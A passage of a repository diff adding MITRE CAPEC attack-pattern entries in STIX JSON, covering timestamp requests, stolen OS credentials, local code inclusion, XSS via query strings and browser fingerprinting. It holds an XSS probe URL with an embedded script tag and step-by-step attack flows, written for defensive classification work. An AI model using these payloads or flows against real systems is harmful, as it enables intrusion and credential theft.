+ "description": "Wikipedia, The Wikimedia Foundation, Inc",
21
+ "external_id": "REF-50",
22
+ "source_name": "reference_from_CAPEC",
23
+ "url": "http://en.wikipedia.org/wiki/Reverse_engineering"
24
+ }
25
+ ],
26
+ "id": "attack-pattern--25946b99-9827-40a6-99a4-ca15eea08e5d",
27
+ "modified": "2023-01-24T00:00:00.000Z",
28
+ "name": "Reverse Engineering",
29
+ "object_marking_refs": [
30
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
31
+ ],
32
+ "type": "attack-pattern",
33
+ "x_capec_abstraction": "Meta",
34
+ "x_capec_domains": [
35
+ "Software",
36
+ "Physical Security",
37
+ "Hardware"
38
+ ],
39
+ "x_capec_example_instances": [
40
+ "When adversaries are reverse engineering software, methodologies fall into two broad categories, 'white box' and 'black box.' White box techniques involve methods which can be applied to a piece of software when an executable or some other compiled object can be directly subjected to analysis, revealing at least a portion of its machine instructions that can be observed upon execution. 'Black Box' methods involve interacting with the software indirectly, in the absence of the ability to measure, instrument, or analyze an executable object directly. Such analysis typically involves interacting with the software at the boundaries of where the software interfaces with a larger execution environment, such as input-output vectors, libraries, or APIs."
41
+ ],
42
+ "x_capec_likelihood_of_attack": "Low",
43
+ "x_capec_parent_of_refs": [
44
+ "attack-pattern--d17eb5a5-1361-4e13-a969-e4d587d13b3d",
45
+ "attack-pattern--4ba540ef-b8ad-4bf7-acac-d8855661c4a2"
46
+ ],
47
+ "x_capec_prerequisites": [
48
+ "Access to targeted system, resources, and information."
49
+ ],
50
+ "x_capec_resources_required": [
51
+ "The technical resources necessary to engage in reverse engineering differ in accordance with the type of object, resource, or system being analyzed."
52
+ ],
53
+ "x_capec_skills_required": {
54
+ "High": "Understanding of low level programming languages or technologies can be very helpful. For example, when reverse engineering a binary file, an understanding of assembly languages can help to determine the purpose and inner-workings of the code. Another example is reverse engineering an application that relies on networking. Here, an understanding networking protocols can provide insight into application details."
55
+ },
56
+ "x_capec_status": "Stable",
57
+ "x_capec_typical_severity": "Low",
58
+ "x_capec_version": "3.9"
59
+ }
60
+ ],
61
+ "spec_version": "2.0",
62
+ "type": "bundle"
63
+ }
cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--25aafa9d-84f2-4f9d-a19e-280e20bcd16c.json ADDED
@@ -0,0 +1,90 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "id": "bundle--1183af13-4a97-4947-8000-f2e9ecd793cf",
3
+ "objects": [
4
+ {
5
+ "created": "2014-06-23T00:00:00.000Z",
6
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
7
+ "description": "This pattern of attack leverages standard requests to learn the exact time associated with a target system. An adversary may be able to use the timestamp returned from the target to attack time-based security algorithms, such as random number generators, or time-based authentication mechanisms.",
8
+ "external_references": [
9
+ {
10
+ "external_id": "CAPEC-295",
11
+ "source_name": "capec",
12
+ "url": "https://capec.mitre.org/data/definitions/295.html"
13
+ },
14
+ {
15
+ "external_id": "CWE-200",
16
+ "source_name": "cwe",
17
+ "url": "http://cwe.mitre.org/data/definitions/200.html"
18
+ },
19
+ {
20
+ "description": "System Time Discovery",
21
+ "external_id": "T1124",
22
+ "source_name": "ATTACK",
23
+ "url": "https://attack.mitre.org/wiki/Technique/T1124"
24
+ },
25
+ {
26
+ "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill",
27
+ "external_id": "REF-33",
28
+ "source_name": "reference_from_CAPEC"
29
+ },
30
+ {
31
+ "description": "J. Postel, RFC792 - Internet Control Messaging Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)",
32
+ "external_id": "REF-123",
33
+ "source_name": "reference_from_CAPEC",
34
+ "url": "http://www.faqs.org/rfcs/rfc792.html"
35
+ },
36
+ {
37
+ "description": "R. Braden, Ed., RFC1122 - Requirements for Internet Hosts - Communication Layers, 1989--10",
38
+ "external_id": "REF-124",
39
+ "source_name": "reference_from_CAPEC",
40
+ "url": "http://www.faqs.org/rfcs/rfc1122.html"
41
+ },
42
+ {
43
+ "description": "Mark Wolfgang, Host Discovery with Nmap, 2002--11",
44
+ "external_id": "REF-125",
45
+ "source_name": "reference_from_CAPEC",
46
+ "url": "http://nmap.org/docs/discovery.pdf"
47
+ },
48
+ {
49
+ "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition), 2008, Insecure.com LLC, ISBN: 978-0-9799587-1-7",
50
+ "external_id": "REF-147",
51
+ "source_name": "reference_from_CAPEC"
52
+ }
53
+ ],
54
+ "id": "attack-pattern--25aafa9d-84f2-4f9d-a19e-280e20bcd16c",
55
+ "modified": "2019-09-30T00:00:00.000Z",
56
+ "name": "Timestamp Request",
57
+ "object_marking_refs": [
58
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
59
+ ],
60
+ "type": "attack-pattern",
61
+ "x_capec_abstraction": "Detailed",
62
+ "x_capec_child_of_refs": [
63
+ "attack-pattern--d780db94-413f-402d-a4d9-cf179b316c8c"
64
+ ],
65
+ "x_capec_consequences": {
66
+ "Confidentiality": [
67
+ "Other"
68
+ ]
69
+ },
70
+ "x_capec_domains": [
71
+ "Software"
72
+ ],
73
+ "x_capec_example_instances": [
74
+ "An adversary sends an ICMP type 13 Timestamp Request to determine the time as recorded by a remote target. Timestamp Replies, ICMP Type 14, usually return a value in Greenwich Mean Time. An adversary can attempt to use an ICMP Timestamp requests to 'ping' a remote system to see if is alive. Additionally, because these types of messages are rare they are easily spotted by intrusion detection systems, many ICMP scanning tools support IP spoofing to help conceal the origin of the actual request among a storm of similar ICMP messages. It is a common practice for border firewalls and gateways to be configured to block ingress ICMP type 13 and egress ICMP type 14 messages.",
75
+ "An adversary may gather the system time or time zone from a local or remote system. This information may be gathered in a number of ways, such as with Net on Windows by performing net time \\\\hostname to gather the system time on a remote system. The victim's time zone may also be inferred from the current system time or gathered by using w32tm /tz. The information could be useful for performing other techniques, such as executing a file with a Scheduled Task, or to discover locality information based on time zone to assist in victim targeting"
76
+ ],
77
+ "x_capec_prerequisites": [
78
+ "The ability to send a timestamp request to a remote target and receive a response."
79
+ ],
80
+ "x_capec_resources_required": [
81
+ "Scanners or utilities that provide the ability to send custom ICMP queries."
82
+ ],
83
+ "x_capec_status": "Stable",
84
+ "x_capec_typical_severity": "Low",
85
+ "x_capec_version": "3.9"
86
+ }
87
+ ],
88
+ "spec_version": "2.0",
89
+ "type": "bundle"
90
+ }
cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a.json ADDED
@@ -0,0 +1,138 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "id": "bundle--a72b5503-c277-4470-9497-18fa49de07a4",
3
+ "objects": [
4
+ {
5
+ "created": "2020-07-30T00:00:00.000Z",
6
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
7
+ "description": "An adversary guesses or obtains (i.e. steals or purchases) legitimate operating system credentials (e.g. userID/password) to achieve authentication and to perform authorized actions on the system, under the guise of an authenticated user or service. This applies to any Operating System.",
8
+ "external_references": [
9
+ {
10
+ "external_id": "CAPEC-653",
11
+ "source_name": "capec",
12
+ "url": "https://capec.mitre.org/data/definitions/653.html"
13
+ },
14
+ {
15
+ "external_id": "CWE-522",
16
+ "source_name": "cwe",
17
+ "url": "http://cwe.mitre.org/data/definitions/522.html"
18
+ },
19
+ {
20
+ "external_id": "CWE-307",
21
+ "source_name": "cwe",
22
+ "url": "http://cwe.mitre.org/data/definitions/307.html"
23
+ },
24
+ {
25
+ "external_id": "CWE-308",
26
+ "source_name": "cwe",
27
+ "url": "http://cwe.mitre.org/data/definitions/308.html"
28
+ },
29
+ {
30
+ "external_id": "CWE-309",
31
+ "source_name": "cwe",
32
+ "url": "http://cwe.mitre.org/data/definitions/309.html"
33
+ },
34
+ {
35
+ "external_id": "CWE-262",
36
+ "source_name": "cwe",
37
+ "url": "http://cwe.mitre.org/data/definitions/262.html"
38
+ },
39
+ {
40
+ "external_id": "CWE-263",
41
+ "source_name": "cwe",
42
+ "url": "http://cwe.mitre.org/data/definitions/263.html"
43
+ },
44
+ {
45
+ "external_id": "CWE-654",
46
+ "source_name": "cwe",
47
+ "url": "http://cwe.mitre.org/data/definitions/654.html"
48
+ },
49
+ {
50
+ "description": "Dan Goodin, Attackers can use Zoom to steal users’ Windows credentials with no warning, 2020--04---01, Ars Technica",
51
+ "external_id": "REF-575",
52
+ "source_name": "reference_from_CAPEC",
53
+ "url": "https://arstechnica.com/information-technology/2020/04/unpatched-zoom-bug-lets-attackers-steal-windows-credentials-with-no-warning/"
54
+ },
55
+ {
56
+ "description": "Jeff Warren, How Attackers are Stealing Your Credentials with Mimikatz, 2017--07---11, STEALTHbits Technologies, Inc.",
57
+ "external_id": "REF-576",
58
+ "source_name": "reference_from_CAPEC",
59
+ "url": "https://blog.stealthbits.com/how-attackers-are-stealing-your-credentials-with-mimikatz/"
60
+ }
61
+ ],
62
+ "id": "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a",
63
+ "modified": "2022-09-29T00:00:00.000Z",
64
+ "name": "Use of Known Operating System Credentials",
65
+ "object_marking_refs": [
66
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
67
+ ],
68
+ "type": "attack-pattern",
69
+ "x_capec_abstraction": "Standard",
70
+ "x_capec_can_follow_refs": [
71
+ "attack-pattern--a9dc4914-409a-4f71-80df-c5cc3923d112",
72
+ "attack-pattern--8d88a81c-bde9-4fb3-acbe-901c783d6427",
73
+ "attack-pattern--addd93c9-9278-4185-b402-e505d632c815",
74
+ "attack-pattern--a390cb72-b4de-4750-ae05-be556c89f4be",
75
+ "attack-pattern--f724f0f3-20e6-450c-be4a-f373ea08834d",
76
+ "attack-pattern--fab7fb48-4503-4e03-980f-9bc827be929f",
77
+ "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a",
78
+ "attack-pattern--8c7bab16-5ecd-4778-9b04-c185bceed170"
79
+ ],
80
+ "x_capec_can_precede_refs": [
81
+ "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b"
82
+ ],
83
+ "x_capec_child_of_refs": [
84
+ "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7"
85
+ ],
86
+ "x_capec_consequences": {
87
+ "Access_Control": [
88
+ "Gain Privileges"
89
+ ],
90
+ "Authentication": [
91
+ "Gain Privileges"
92
+ ],
93
+ "Authorization": [
94
+ "Read Data"
95
+ ],
96
+ "Confidentiality": [
97
+ "Gain Privileges",
98
+ "Read Data"
99
+ ],
100
+ "Integrity": [
101
+ "Modify Data"
102
+ ]
103
+ },
104
+ "x_capec_domains": [
105
+ "Software"
106
+ ],
107
+ "x_capec_example_instances": [
108
+ "Adversaries exploited the Zoom video conferencing application during the 2020 COVID-19 pandemic to exfiltrate Windows domain credentials from a target system. The attack entailed sending Universal Naming Convention (UNC) paths within the Zoom chat window of an unprotected Zoom call. If the victim clicked on the link, their Windows usernames and the corresponding Net-NTLM-v2 hashes were sent to the address contained in the link. The adversary was then able to infiltrate and laterally move within the Windows domain by passing the acquired credentials to shared network resources. This further provided adversaries with access to Outlook servers and network storage devices. [REF-575]",
109
+ "Mimikatz, a post-exploitation Windows credential harvester, can be used to gather and exploit Windows credentials. This malware has been used in several known cyberattacks, such as the Petya Ransomeware attacks. [REF-576]"
110
+ ],
111
+ "x_capec_execution_flow": "<h2> Execution Flow </h2><div><h3>Explore</h3><ol><li> <p> <b>Acquire known operating system credentials: </b>The adversary must obtain known operating system credentials in order to access the target system, application, or service within the domain.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>An adversary purchases breached operating system username/password combinations or leaked hashed passwords from the dark web.</td></tr><tr><td>An adversary leverages a key logger or phishing attack to steal user credentials as they are provided.</td></tr><tr><td>An adversary conducts a sniffing attack to steal operating system credentials as they are transmitted.</td></tr><tr><td>An adversary gains access to a system/files and exfiltrates password hashes.</td></tr><tr><td>An adversary examines outward-facing configuration and properties files to discover hardcoded credentials.</td></tr></tbody></table></ol></div><div><h3>Experiment</h3><ol><li> <p> <b>Attempt authentication: </b>Try each operating system credential against various systems, applications, and services within the domain until the target grants access.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Manually or automatically enter each credential through the target's interface.</td></tr></tbody></table></ol></div><div><h3>Exploit</h3><ol><li> <p> <b>Impersonate: </b>An adversary can use successful experiments or authentications to impersonate an authorized user or system, or to laterally move within the network</p></li><li> <p> <b>Spoofing: </b>Malicious data can be injected into the target system or into other systems on the network. The adversary can also pose as a legitimate user to perform social engineering attacks.</p></li><li> <p> <b>Data Exfiltration: </b>The adversary can obtain sensitive data contained within system files or application configuration.</p></li></ol></div>",
112
+ "x_capec_extended_description": "\n <xhtml:p>This attack can be extremely harmful when the operating system credentials used are for a root or admin user. Once an adversary gains access using credentials with elevated privileges, they are free to alter important system files which can effect other users who may use the system or other users on the system's network.</xhtml:p>\n ",
113
+ "x_capec_likelihood_of_attack": "High",
114
+ "x_capec_parent_of_refs": [
115
+ "attack-pattern--f2654def-b86d-4ddb-888f-de6b50a103a2",
116
+ "attack-pattern--056a463d-6303-438e-a43f-992cee52fb95"
117
+ ],
118
+ "x_capec_prerequisites": [
119
+ "The system/application uses one factor password-based authentication, SSO, and/or cloud-based authentication.",
120
+ "The system/application does not have a sound password policy that is being enforced.",
121
+ "The system/application does not implement an effective password throttling mechanism.",
122
+ "The adversary possesses a list of known user accounts and corresponding passwords that may exist on the target."
123
+ ],
124
+ "x_capec_resources_required": [
125
+ "A list of known credentials for the targeted domain.",
126
+ "A custom script that leverages a credential list to launch an attack."
127
+ ],
128
+ "x_capec_skills_required": {
129
+ "Low": "Once an adversary obtains a known credential, leveraging it is trivial."
130
+ },
131
+ "x_capec_status": "Draft",
132
+ "x_capec_typical_severity": "High",
133
+ "x_capec_version": "3.9"
134
+ }
135
+ ],
136
+ "spec_version": "2.0",
137
+ "type": "bundle"
138
+ }
cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--27f34b27-52ae-42ae-a5c4-1155641eab90.json ADDED
@@ -0,0 +1,29 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "id": "bundle--39a26a9c-fdf3-4a10-b70b-eda1acc43b34",
3
+ "objects": [
4
+ {
5
+ "created": "2014-06-23T00:00:00.000Z",
6
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
7
+ "description": "This attack pattern has been deprecated as it was merged into \"CAPEC-215 : Fuzzing for application mapping\". Please refer to this other CAPEC going forward.",
8
+ "external_references": [
9
+ {
10
+ "external_id": "CAPEC-214",
11
+ "source_name": "capec",
12
+ "url": "https://capec.mitre.org/data/definitions/214.html"
13
+ }
14
+ ],
15
+ "id": "attack-pattern--27f34b27-52ae-42ae-a5c4-1155641eab90",
16
+ "modified": "2020-12-17T00:00:00.000Z",
17
+ "name": "DEPRECATED: Fuzzing for garnering J2EE/.NET-based stack traces, for application mapping",
18
+ "object_marking_refs": [
19
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
20
+ ],
21
+ "type": "attack-pattern",
22
+ "x_capec_abstraction": "Detailed",
23
+ "x_capec_status": "Deprecated",
24
+ "x_capec_version": "3.9"
25
+ }
26
+ ],
27
+ "spec_version": "2.0",
28
+ "type": "bundle"
29
+ }
cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--283d665d-e109-4d5d-8993-6fb25e5923d6.json ADDED
@@ -0,0 +1,73 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "id": "bundle--fb87914a-7c2d-4285-9394-45045d0ff64e",
3
+ "objects": [
4
+ {
5
+ "created": "2014-06-23T00:00:00.000Z",
6
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
7
+ "description": "The attacker forces an application to load arbitrary code files from the local machine. The attacker could use this to try to load old versions of library files that have known vulnerabilities, to load files that the attacker placed on the local machine during a prior attack, or to otherwise change the functionality of the targeted application in unexpected ways.",
8
+ "external_references": [
9
+ {
10
+ "external_id": "CAPEC-251",
11
+ "source_name": "capec",
12
+ "url": "https://capec.mitre.org/data/definitions/251.html"
13
+ },
14
+ {
15
+ "external_id": "CWE-829",
16
+ "source_name": "cwe",
17
+ "url": "http://cwe.mitre.org/data/definitions/829.html"
18
+ },
19
+ {
20
+ "description": "Process Injection",
21
+ "external_id": "T1055",
22
+ "source_name": "ATTACK",
23
+ "url": "https://attack.mitre.org/wiki/Technique/T1055"
24
+ },
25
+ {
26
+ "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)",
27
+ "external_id": "REF-613",
28
+ "source_name": "reference_from_CAPEC",
29
+ "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion.html"
30
+ }
31
+ ],
32
+ "id": "attack-pattern--283d665d-e109-4d5d-8993-6fb25e5923d6",
33
+ "modified": "2020-12-17T00:00:00.000Z",
34
+ "name": "Local Code Inclusion",
35
+ "object_marking_refs": [
36
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
37
+ ],
38
+ "type": "attack-pattern",
39
+ "x_capec_abstraction": "Standard",
40
+ "x_capec_child_of_refs": [
41
+ "attack-pattern--505cd025-b5c5-4393-a228-addace874465"
42
+ ],
43
+ "x_capec_consequences": {
44
+ "Confidentiality": [
45
+ "Read Data (An attacker may leverage local code inclusion in order to print sensitive data to a page, such as hidden configuration files or or password hashes.)"
46
+ ],
47
+ "Integrity": [
48
+ "Execute Unauthorized Commands (Through local code inclusion, the adversary compromises the integrity of the application.)"
49
+ ]
50
+ },
51
+ "x_capec_domains": [
52
+ "Software"
53
+ ],
54
+ "x_capec_parent_of_refs": [
55
+ "attack-pattern--d56469be-4ebc-4443-b85a-3097193df4c4",
56
+ "attack-pattern--8bb5fe8b-4746-4b90-9e89-b65c4daa21e4",
57
+ "attack-pattern--fa4feb09-657b-40a0-9edd-6187b55047e3"
58
+ ],
59
+ "x_capec_prerequisites": [
60
+ "The targeted application must have a bug that allows an adversary to control which code file is loaded at some juncture.",
61
+ "Some variants of this attack may require that old versions of some code files be present and in predictable locations."
62
+ ],
63
+ "x_capec_resources_required": [
64
+ "The adversary needs to have enough access to the target application to control the identity of a locally included file. The attacker may also need to be able to upload arbitrary code files to the target machine, although any location for these files may be acceptable."
65
+ ],
66
+ "x_capec_status": "Stable",
67
+ "x_capec_typical_severity": "Medium",
68
+ "x_capec_version": "3.9"
69
+ }
70
+ ],
71
+ "spec_version": "2.0",
72
+ "type": "bundle"
73
+ }
cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--28aff255-abc8-4392-872c-61f78d4fe55b.json ADDED
@@ -0,0 +1,78 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "id": "bundle--703e5e53-6586-46f3-91de-2f6c5b7ec98d",
3
+ "objects": [
4
+ {
5
+ "created": "2014-06-23T00:00:00.000Z",
6
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
7
+ "description": "An adversary embeds malicious script code in the parameters of an HTTP query string and convinces a victim to submit the HTTP request that contains the query string to a vulnerable web application. The web application then procedes to use the values parameters without properly validation them first and generates the HTML code that will be executed by the victim's browser.",
8
+ "external_references": [
9
+ {
10
+ "external_id": "CAPEC-32",
11
+ "source_name": "capec",
12
+ "url": "https://capec.mitre.org/data/definitions/32.html"
13
+ },
14
+ {
15
+ "external_id": "CWE-80",
16
+ "source_name": "cwe",
17
+ "url": "http://cwe.mitre.org/data/definitions/80.html"
18
+ },
19
+ {
20
+ "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley",
21
+ "external_id": "REF-1",
22
+ "source_name": "reference_from_CAPEC"
23
+ }
24
+ ],
25
+ "id": "attack-pattern--28aff255-abc8-4392-872c-61f78d4fe55b",
26
+ "modified": "2022-02-22T00:00:00.000Z",
27
+ "name": "XSS Through HTTP Query Strings",
28
+ "object_marking_refs": [
29
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
30
+ ],
31
+ "type": "attack-pattern",
32
+ "x_capec_abstraction": "Detailed",
33
+ "x_capec_child_of_refs": [
34
+ "attack-pattern--61b17787-fe92-427c-9e6a-6311997d7b2a",
35
+ "attack-pattern--b1eef783-daae-494c-a418-cd9ada7cbe8b",
36
+ "attack-pattern--800f8095-99b6-4bb9-8bc6-8b9727201a2f"
37
+ ],
38
+ "x_capec_consequences": {
39
+ "Availability": [
40
+ "Execute Unauthorized Commands (Run Arbitrary Code)"
41
+ ],
42
+ "Confidentiality": [
43
+ "Read Data",
44
+ "Execute Unauthorized Commands (Run Arbitrary Code)"
45
+ ],
46
+ "Integrity": [
47
+ "Execute Unauthorized Commands (Run Arbitrary Code)"
48
+ ]
49
+ },
50
+ "x_capec_domains": [
51
+ "Software",
52
+ "Software",
53
+ "Software"
54
+ ],
55
+ "x_capec_example_instances": [
56
+ "http://user:host@example.com:8080/oradb<script>alert('Hi')</script>",
57
+ "\n <xhtml:p>Web applications that accept name value pairs in a HTTP Query string are inherently at risk to any value (or name for that matter) that an adversary would like to enter in the query string. This can be done manually via web browser or trivially scripted to post the query string to multiple sites. In the latter case, in the instance of many sites using similar infrastructure with predictable http queries being accepted and operated on (such as blogging software, Google applications, and so on), a single malicious payload can be scripted to target a wide variety of sites.</xhtml:p>\n <xhtml:p>Web 2.0 type sites like Technorati and del.icio.us rely on user generated content like tags to build http links that are displayed to other users. del.icio.us allows users to identify sites, tag them with metadata and provide URL, descriptions and more data. This data is then echoed back to any other web browser that is interested in the link. If the data is not validated by the del.icio.us site properly then an arbitrary code can be added into the standard http string sent to del.icio.us by the adversary, for example formatted as normal content with a URL and description and tagged as Java, and available to be clicked on (and executed by) any user browsing for Java content that clicks on this trojaned content.</xhtml:p>\n "
58
+ ],
59
+ "x_capec_execution_flow": "<h2> Execution Flow </h2><div><h3>Explore</h3><ol><li> <p> <b>Survey the application for public links: </b>Using a browser or an automated tool, an adversary follows all public links on a web site. They record all the links they find.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Use a spidering tool to follow and record all links. Make special note of any links that include parameters in the URL.</td></tr><tr><td>Use a proxy tool to record all links visited during a manual traversal of the web application. Make special note of any links that include parameters in the URL. Manual traversal of this type is frequently necessary to identify forms that are GET method forms rather than POST forms.</td></tr><tr><td>Use a browser to manually explore the website and analyze how it is constructed. Many browser's plugins are available to facilitate the analysis or automate the URL discovery.</td></tr></tbody></table></ol></div><div><h3>Experiment</h3><ol><li> <p> <b>Probe public links for XSS vulnerability: </b>The adversary uses the public links gathered in the \"Explore\" phase as a target list and requests variations on the URLs they spidered before. They send parameters that include variations of payloads. They record all the responses from the server that include unmodified versions of their script.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Use a list of XSS probe strings to inject in parameters of known URLs. If possible, the probe strings contain a unique identifier.</td></tr><tr><td>Use a proxy tool to record results of manual input of XSS probes in known URLs.</td></tr></tbody></table><li> <p> <b>Craft malicious XSS URL: </b>Once the adversary has determined which parameters are vulnerable to XSS, they will craft a malicious URL containing the XSS exploit. The adversary can have many goals, from stealing session IDs, cookies, credentials, and page content from the victim.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Change a URL parameter to include a malicious script tag.</td></tr><tr><td>Send information gathered from the malicious script to a remote endpoint.</td></tr></tbody></table></ol></div><div><h3>Exploit</h3><ol><li> <p> <b>Get victim to click URL: </b>In order for the attack to be successful, the victim needs to access the malicious URL.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Send a phishing email to the victim containing the malicious URL. This can be hidden in a hyperlink as to not show the full URL, which might draw suspicion.</td></tr><tr><td>Put the malicious URL on a public forum, where many victims might accidentally click the link.</td></tr></tbody></table></ol></div>",
60
+ "x_capec_likelihood_of_attack": "High",
61
+ "x_capec_prerequisites": [
62
+ "Target client software must allow scripting such as JavaScript. Server software must allow display of remote generated HTML without sufficient input or output validation."
63
+ ],
64
+ "x_capec_resources_required": [
65
+ "Ability to send HTTP post to scripting host and collect output"
66
+ ],
67
+ "x_capec_skills_required": {
68
+ "High": "Exploiting any information gathered by HTTP Query on script host",
69
+ "Low": "To place malicious payload on server via HTTP"
70
+ },
71
+ "x_capec_status": "Draft",
72
+ "x_capec_typical_severity": "High",
73
+ "x_capec_version": "3.9"
74
+ }
75
+ ],
76
+ "spec_version": "2.0",
77
+ "type": "bundle"
78
+ }
cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--28be41f9-7246-4484-869d-f0e2e82690ee.json ADDED
@@ -0,0 +1,29 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "id": "bundle--98dfa077-fd05-4236-85e8-d95959be4614",
3
+ "objects": [
4
+ {
5
+ "created": "2014-06-23T00:00:00.000Z",
6
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
7
+ "description": "This attack pattern has been deprecated as it a generalization of CAPEC-230: XML Nested Payloads and CAPEC-231: XML Oversized Payloads. Please refer to these CAPECs going forward.",
8
+ "external_references": [
9
+ {
10
+ "external_id": "CAPEC-99",
11
+ "source_name": "capec",
12
+ "url": "https://capec.mitre.org/data/definitions/99.html"
13
+ }
14
+ ],
15
+ "id": "attack-pattern--28be41f9-7246-4484-869d-f0e2e82690ee",
16
+ "modified": "2019-09-30T00:00:00.000Z",
17
+ "name": "DEPRECATED: XML Parser Attack",
18
+ "object_marking_refs": [
19
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
20
+ ],
21
+ "type": "attack-pattern",
22
+ "x_capec_abstraction": "Standard",
23
+ "x_capec_status": "Deprecated",
24
+ "x_capec_version": "3.9"
25
+ }
26
+ ],
27
+ "spec_version": "2.0",
28
+ "type": "bundle"
29
+ }
cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--29e8786c-a791-44c6-b1de-950cf0604643.json ADDED
@@ -0,0 +1,53 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "id": "bundle--a9fbddef-30d3-4dcc-a745-65a538e704d2",
3
+ "objects": [
4
+ {
5
+ "created": "2014-06-23T00:00:00.000Z",
6
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
7
+ "description": "An attacker carefully crafts small snippets of Java Script to efficiently detect the type of browser the potential victim is using. Many web-based attacks need prior knowledge of the web browser including the version of browser to ensure successful exploitation of a vulnerability. Having this knowledge allows an attacker to target the victim with attacks that specifically exploit known or zero day weaknesses in the type and version of the browser used by the victim. Automating this process via Java Script as a part of the same delivery system used to exploit the browser is considered more efficient as the attacker can supply a browser fingerprinting method and integrate it with exploit code, all contained in Java Script and in response to the same web page request by the browser.",
8
+ "external_references": [
9
+ {
10
+ "external_id": "CAPEC-472",
11
+ "source_name": "capec",
12
+ "url": "https://capec.mitre.org/data/definitions/472.html"
13
+ },
14
+ {
15
+ "external_id": "CWE-200",
16
+ "source_name": "cwe",
17
+ "url": "http://cwe.mitre.org/data/definitions/200.html"
18
+ },
19
+ {
20
+ "description": "Gareth Heyes, Detecting browsers javascript hacks, The Spanner, 2009--01---29",
21
+ "external_id": "REF-410",
22
+ "source_name": "reference_from_CAPEC",
23
+ "url": "http://www.thespanner.co.uk/2009/01/29/detecting-browsers-javascript-hacks/"
24
+ }
25
+ ],
26
+ "id": "attack-pattern--29e8786c-a791-44c6-b1de-950cf0604643",
27
+ "modified": "2022-09-29T00:00:00.000Z",
28
+ "name": "Browser Fingerprinting",
29
+ "object_marking_refs": [
30
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
31
+ ],
32
